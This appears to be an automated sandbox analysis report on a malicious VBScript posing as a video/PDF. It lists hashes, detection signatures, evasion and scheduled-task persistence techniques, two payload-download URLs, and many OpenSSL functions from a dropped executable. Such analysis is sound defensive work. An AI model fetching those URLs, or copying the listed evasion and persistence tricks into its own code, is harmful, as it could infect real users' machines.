Windows Analysis Report
Deolane-Video-PDF.vbs

Overview

General Information

Sample name: Deolane-Video-PDF.vbs
Analysis ID: 1523262
MD5: d31a2cb801264fbe84209118744c5cb3
SHA1: efa1ae48805fbdd1a03121822e35b80c95fbc328
SHA256: e6f2d4b6c2f36e268eb147746087928f7a0b68e974d603959a3961a7b00e1680
Tags: vbsuser-Porcupine
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Potentially malicious time measurement code found
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Multi AV Scanner detection for domain / URL
Source: https://estudosadulto.educacao.ws/deolane.mp4# Virustotal: Detection: 5% Perma Link
Source: https://almeidadoprogresso.siteoficial.ws/wsx.zip Virustotal: Detection: 7% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 96.8% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35601F0 EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,CRYPTO_memcmp,strncmp,strncmp,strncmp,strncmp,strncmp, 16_2_00007FFDA35601F0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3573410 ERR_put_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once, 16_2_00007FFDA3573410
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3552310 CRYPTO_free, 16_2_00007FFDA3552310
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35903A0 CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA35903A0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3572450 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free, 16_2_00007FFDA3572450
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3568420 EVP_PKEY_CTX_new,EVP_PKEY_derive_init,EVP_PKEY_derive_set_peer,EVP_PKEY_derive,CRYPTO_malloc,EVP_PKEY_derive,CRYPTO_clear_free,EVP_PKEY_CTX_free, 16_2_00007FFDA3568420
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3554437 CRYPTO_zalloc,ERR_put_error,BIO_set_init,BIO_set_data,BIO_clear_flags, 16_2_00007FFDA3554437
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551514 CRYPTO_free, 16_2_00007FFDA3551514
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35663EA CRYPTO_free, 16_2_00007FFDA35663EA
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355E3F0 CRYPTO_malloc, 16_2_00007FFDA355E3F0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35883F0 CRYPTO_zalloc,CRYPTO_free, 16_2_00007FFDA35883F0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35842D0 OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock, 16_2_00007FFDA35842D0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35662B0 CRYPTO_free,CRYPTO_strdup, 16_2_00007FFDA35662B0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35AA35C CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA35AA35C
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551E60 CRYPTO_clear_free, 16_2_00007FFDA3551E60
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35A82E0 CRYPTO_free,CRYPTO_strndup, 16_2_00007FFDA35A82E0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35517D5 CRYPTO_malloc,memcpy, 16_2_00007FFDA35517D5
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355E1B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc, 16_2_00007FFDA355E1B0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3568180 CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA3568180
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3576190 ERR_put_error,CRYPTO_free,ERR_put_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free, 16_2_00007FFDA3576190
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355109B CRYPTO_free,CRYPTO_memdup,CRYPTO_memdup, 16_2_00007FFDA355109B
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551D52 BN_num_bits,CRYPTO_malloc,BN_bn2bin,BN_clear_free,BN_clear_free, 16_2_00007FFDA3551D52
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35A80C0 CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA35A80C0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355E0A0 CRYPTO_free, 16_2_00007FFDA355E0A0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA356E0B0 CRYPTO_THREAD_run_once, 16_2_00007FFDA356E0B0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3590070 CRYPTO_memcmp, 16_2_00007FFDA3590070
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35516B8 OPENSSL_sk_new_null,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_clear_error,OPENSSL_sk_value,X509_get0_pubkey,EVP_PKEY_missing_parameters,X509_free,X509_up_ref,X509_free,OPENSSL_sk_pop_free, 16_2_00007FFDA35516B8
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355E100 CRYPTO_free, 16_2_00007FFDA355E100
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3584110 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock, 16_2_00007FFDA3584110
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35987CE CRYPTO_free,CRYPTO_free, 16_2_00007FFDA35987CE
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA359A7B0 EVP_DigestUpdate,EVP_MD_CTX_free,EVP_PKEY_CTX_free,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free, 16_2_00007FFDA359A7B0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35B8780 HMAC_CTX_new,EVP_CIPHER_CTX_new,EVP_sha256,HMAC_Init_ex,EVP_aes_256_cbc,HMAC_size,EVP_CIPHER_CTX_iv_length,HMAC_Update,HMAC_Final,CRYPTO_memcmp,EVP_CIPHER_CTX_iv_length,EVP_CIPHER_CTX_iv_length,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free, 16_2_00007FFDA35B8780
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551EAB CRYPTO_memcmp,memchr,CRYPTO_free,CRYPTO_free,CRYPTO_strndup, 16_2_00007FFDA3551EAB
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35519BA CRYPTO_malloc, 16_2_00007FFDA35519BA
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA359C6C0 CRYPTO_malloc, 16_2_00007FFDA359C6C0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35515CD EVP_MD_CTX_new,EVP_PKEY_new,EVP_PKEY_assign,DH_free,EVP_PKEY_security_bits,EVP_PKEY_get0_DH,EVP_PKEY_free,DH_get0_key,EVP_PKEY_get1_tls_encodedpoint,EVP_PKEY_free,CRYPTO_free,EVP_MD_CTX_free,BN_num_bits,BN_num_bits,memset,BN_num_bits,BN_bn2bin,CRYPTO_free,EVP_PKEY_size,EVP_DigestSignInit,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,EVP_DigestSign,CRYPTO_free,EVP_MD_CTX_free, 16_2_00007FFDA35515CD
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3554660 BIO_get_data,BIO_get_shutdown,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free, 16_2_00007FFDA3554660
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551F9B CRYPTO_free,BIO_clear_flags,BIO_set_flags,BIO_snprintf,ERR_add_error_data,memcpy, 16_2_00007FFDA3551F9B
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA357C740 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_put_error, 16_2_00007FFDA357C740
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35A2730 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,memcpy,memcpy, 16_2_00007FFDA35A2730
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551249 CRYPTO_zalloc,ERR_put_error,_time64,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,memcpy, 16_2_00007FFDA3551249
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551F78 CRYPTO_strdup, 16_2_00007FFDA3551F78
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551B18 memset,OPENSSL_cleanse,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,CRYPTO_memcmp, 16_2_00007FFDA3551B18
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35519EC CRYPTO_malloc,ERR_put_error,CRYPTO_free, 16_2_00007FFDA35519EC
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35A85A0 CRYPTO_malloc,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,RAND_bytes,EVP_sha256,EVP_EncryptUpdate,EVP_EncryptFinal,HMAC_Update,HMAC_Final, 16_2_00007FFDA35A85A0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551AB9 CRYPTO_free, 16_2_00007FFDA3551AB9
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3558590 CRYPTO_zalloc,ERR_put_error, 16_2_00007FFDA3558590
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3590590 CRYPTO_free,CRYPTO_strndup, 16_2_00007FFDA3590590
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551EB5 CRYPTO_strdup,CRYPTO_free, 16_2_00007FFDA3551EB5
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3558640 CRYPTO_zalloc,ERR_put_error,BUF_MEM_grow, 16_2_00007FFDA3558640
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551500 CRYPTO_free,CRYPTO_memdup,ERR_put_error, 16_2_00007FFDA3551500
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3552149 ERR_put_error,CRYPTO_realloc,CRYPTO_realloc,ERR_put_error, 16_2_00007FFDA3552149
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA359A5E0 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free, 16_2_00007FFDA359A5E0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3584490 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset, 16_2_00007FFDA3584490
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA359848F CRYPTO_malloc, 16_2_00007FFDA359848F
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355225C CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_put_error, 16_2_00007FFDA355225C
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551B95 CRYPTO_free,CRYPTO_malloc, 16_2_00007FFDA3551B95
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551208 CRYPTO_zalloc,memcpy,memcpy,memcpy,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA3551208
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355E510 CRYPTO_free,CRYPTO_malloc, 16_2_00007FFDA355E510
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA359C510 EVP_CIPHER_CTX_free,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA359C510
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35644F0 CRYPTO_clear_free, 16_2_00007FFDA35644F0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551CE4 CRYPTO_free,CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA3551CE4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA356CBB0 i2d_X509_NAME,i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA356CBB0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551230 memcpy,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,memcmp,_time64, 16_2_00007FFDA3551230
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA357CB90 ERR_put_error,ERR_put_error,ERR_put_error,EVP_MD_size,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_malloc,ERR_put_error,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,ERR_put_error,EVP_PKEY_free,X509_get0_pubkey,X509_free,OPENSSL_sk_push,ERR_put_error,X509_free,ERR_put_error, 16_2_00007FFDA357CB90
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3556BE0 CRYPTO_zalloc,CRYPTO_free, 16_2_00007FFDA3556BE0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA359ABF0 memset,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free, 16_2_00007FFDA359ABF0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35B6AC0 CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA35B6AC0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA356CB50 CRYPTO_get_ex_new_index, 16_2_00007FFDA356CB50
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3558B20 CRYPTO_free, 16_2_00007FFDA3558B20
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35A6B00 EVP_MD_CTX_new,X509_get0_pubkey,EVP_PKEY_id,EVP_PKEY_id,EVP_PKEY_id,EVP_PKEY_size,EVP_DigestVerifyInit,EVP_PKEY_id,CRYPTO_malloc,BUF_reverse,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,EVP_DigestUpdate,EVP_MD_CTX_ctrl,EVP_DigestVerify,BIO_free,EVP_MD_CTX_free,CRYPTO_free, 16_2_00007FFDA35A6B00
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA357C9D0 ERR_put_error,CRYPTO_realloc,CRYPTO_realloc,ERR_put_error, 16_2_00007FFDA357C9D0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3552252 BIO_s_file,BIO_new,BIO_ctrl,strncmp,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free, 16_2_00007FFDA3552252
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA356A970 CRYPTO_THREAD_run_once, 16_2_00007FFDA356A970
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35518CF CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_memdup, 16_2_00007FFDA35518CF
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551357 memcmp,memcmp,EVP_CIPHER_CTX_free,CRYPTO_free,CRYPTO_free,memcmp,memcmp,memcpy,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA3551357
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355250E CRYPTO_free, 16_2_00007FFDA355250E
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3568870 CRYPTO_malloc,memset,memcpy,memcpy,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,CRYPTO_clear_free,OPENSSL_cleanse, 16_2_00007FFDA3568870
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551C26 EVP_CIPHER_key_length,EVP_CIPHER_iv_length,CRYPTO_malloc, 16_2_00007FFDA3551C26
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3574900 X509_VERIFY_PARAM_free,CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,user_finish,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,CRYPTO_THREAD_lock_free,CRYPTO_free, 16_2_00007FFDA3574900
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA357C8E0 CRYPTO_free,CRYPTO_free, 16_2_00007FFDA357C8E0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3566F93 CRYPTO_free,CRYPTO_strdup,ERR_put_error,ERR_put_error, 16_2_00007FFDA3566F93
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA359AF60 X509_get0_pubkey,CRYPTO_malloc,RAND_bytes,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_PKEY_CTX_free, 16_2_00007FFDA359AF60
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA359D040 CRYPTO_free,CRYPTO_free, 16_2_00007FFDA359D040
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551B5E EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,CRYPTO_free, 16_2_00007FFDA3551B5E
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3552261 CRYPTO_zalloc,ERR_put_error, 16_2_00007FFDA3552261
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3588FF0 EVP_MD_size,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,BIO_ctrl,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key,EVP_DigestSignInit,EVP_DigestUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free, 16_2_00007FFDA3588FF0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA356EE80 CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_value,EVP_CIPHER_flags,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_get_cipherbyname,EVP_get_cipherbyname, 16_2_00007FFDA356EE80
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355EE90 EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,CRYPTO_memcmp, 16_2_00007FFDA355EE90
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551DAC CONF_parse_list,ERR_put_error,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA3551DAC
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551B4A CRYPTO_THREAD_write_lock,OPENSSL_LH_set_down_load,CRYPTO_THREAD_unlock, 16_2_00007FFDA3551B4A
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3586DC0 CRYPTO_free,CRYPTO_strdup,CRYPTO_free, 16_2_00007FFDA3586DC0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551BF9 ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_put_error,CRYPTO_free,OPENSSL_LH_new,OPENSSL_sk_num,EVP_get_digestbyname,EVP_get_digestbyname,OPENSSL_sk_new_null,OPENSSL_sk_new_null,CRYPTO_new_ex_data,RAND_bytes,RAND_priv_bytes,RAND_priv_bytes,RAND_priv_bytes, 16_2_00007FFDA3551BF9
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35A0D60 EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA35A0D60
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35522DE ERR_put_error,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free, 16_2_00007FFDA35522DE
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3558E30 CRYPTO_malloc,ERR_put_error, 16_2_00007FFDA3558E30
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA35A0E00 CRYPTO_malloc,ERR_put_error,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_zalloc,ERR_put_error,CRYPTO_free, 16_2_00007FFDA35A0E00
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA355172B CRYPTO_free,CRYPTO_strndup, 16_2_00007FFDA355172B
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3551FB9 BN_bin2bn,BN_is_zero,CRYPTO_free,CRYPTO_strdup,CRYPTO_clear_free, 16_2_00007FFDA3551FB9
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3582C70 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock, 16_2_00007FFDA3582C70
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3586D50 CRYPTO_free, 16_2_00007FFDA3586D50
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFDA3552545 CRYPTO_malloc,ERR_put_error,BIO_snprintf, 16_2_00007FFDA3552545
